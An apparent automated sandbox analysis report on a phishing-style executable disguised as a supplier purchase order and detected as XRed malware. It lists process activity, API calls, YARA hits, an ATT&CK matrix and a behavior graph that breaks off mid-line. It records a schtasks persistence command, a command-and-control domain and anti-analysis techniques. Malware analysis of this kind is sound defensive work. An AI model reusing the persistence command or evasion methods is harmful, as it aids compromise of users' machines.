                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeWindow / User API: threadDelayed 4979Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeWindow / User API: foregroundWindowGot 1527Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_9-107906
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeAPI coverage: 3.8 %
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe TID: 7032Thread sleep time: -49790s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5208Thread sleep count: 64 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5208Thread sleep time: -3840000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4972Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                              Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeThread sleep count: Count: 4979 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000007.00000002.3396869708.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3397773164.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3396869708.0000000000817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2188, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA2044
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00EA219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00EA24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00E96B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E96E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00E96E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00E9F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_00E9FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_00E6DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E9FD47 FindFirstFileW,FindClose,9_2_00E9FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,9_2_00E6E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: TXAASJ.exe, 0000000F.00000003.2421242122.0000000001203000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA703C BlockInput,9_2_00EA703C
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E5374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,9_2_00E5374E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E846D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,9_2_00E846D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EB20F6 LoadLibraryA,GetProcAddress,9_2_00EB20F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E7A937 GetProcessHeap,9_2_00E7A937
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E78E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00E78E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E78E19 SetUnhandledExceptionFilter,9_2_00E78E19
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8BE95 LogonUserW,9_2_00E8BE95
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E5374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,9_2_00E5374E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E94B52 SendInput,keybd_event,9_2_00E94B52
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E97DD5 mouse_event,9_2_00E97DD5
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,9_2_00E8B398
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E8BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,9_2_00E8BE31
                              Source: TXAASJ.exeBinary or memory string: Shell_TrayWnd
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2153702362.0000000005F2A000.00000004.00000020.00020000.00000000.sdmp, New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000000.2139101361.0000000000566000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E77254 cpuid 9_2_00E77254
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E740DA GetSystemTimeAsFileTime,__aulldiv,9_2_00E740DA
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00ECC146 GetUserNameW,9_2_00ECC146
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E82C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,9_2_00E82C3C
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,9_2_00E6E47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: New PO - Supplier 16-12-2024-Pdf.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: New PO - Supplier 16-12-2024-Pdf.exe PID: 1472, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4508, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FCE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: TXAASJ.exe, 00000014.00000002.2576164901.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: TXAASJ.exe, 00000014.00000003.2556035449.0000000004637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: TXAASJ.exeBinary or memory string: WIN_XP
                              Source: TXAASJ.exe, 0000000E.00000002.2354999669.00000000047FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81|
                              Source: TXAASJ.exeBinary or memory string: WIN_XPe
                              Source: TXAASJ.exeBinary or memory string: WIN_VISTA
                              Source: TXAASJ.exeBinary or memory string: WIN_7
                              Source: TXAASJ.exeBinary or memory string: WIN_8

                              Remote Access Functionality

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: New PO - Supplier 16-12-2024-Pdf.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.New PO - Supplier 16-12-2024-Pdf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2138979280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: New PO - Supplier 16-12-2024-Pdf.exe PID: 1472, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4508, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FCE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_00EA91DC
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_00EA96E2

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information421
                              Scripting                              		2
                              Valid Accounts                              		11
                              Windows Management Instrumentation                              		421
                              Scripting                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media                              		2
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol21
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Extra Window Memory Injection                              		2
                              Obfuscated Files or Information                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              DLL Side-Loading                              		NTDS4
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder                              		21
                              Access Token Manipulation                              		1
                              Extra Window Memory Injection                              		LSA Secrets38
                              System Information Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection                              		112
                              Masquerading                              		Cached Domain Credentials1
                              Query Registry                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		DCSync151
                              Security Software Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder                              		31
                              Virtualization/Sandbox Evasion                              		Proc Filesystem31
                              Virtualization/Sandbox Evasion                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                              Access Token Manipulation                              		/etc/passwd and /etc/shadow3
                              Process Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                              Process Injection                              		Network Sniffing11
                              Application Window Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                              System Owner/User Discovery                              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582347 Sample: New PO - Supplier 16-12-202... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 51 freedns.afraid.org 2->51 53 xred.mooo.com 2->53 55 2 other IPs or domains 2->55 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 73 18 other signatures 2->73 9 New PO - Supplier 16-12-2024-Pdf.exe 1 6 2->9         started        12 TXAASJ.exe 2->12         started        15 EXCEL.EXE 229 70 2->15         started        17 6 other processes 2->17 signatures3 71 Uses dynamic DNS services 51->71 process4 file5 43 ._cache_New PO - S... 16-12-2024-Pdf.exe, PE32 9->43 dropped 45 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\RCX6FCE.tmp, PE32 9->47 dropped 49 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->49 dropped 19 Synaptics.exe 71 9->19         started        24 ._cache_New PO - Supplier 16-12-2024-Pdf.exe 2 5 9->24         started        83 Antivirus detection for dropped file 12->83 85 Multi AV Scanner detection for dropped file 12->85 87 Machine 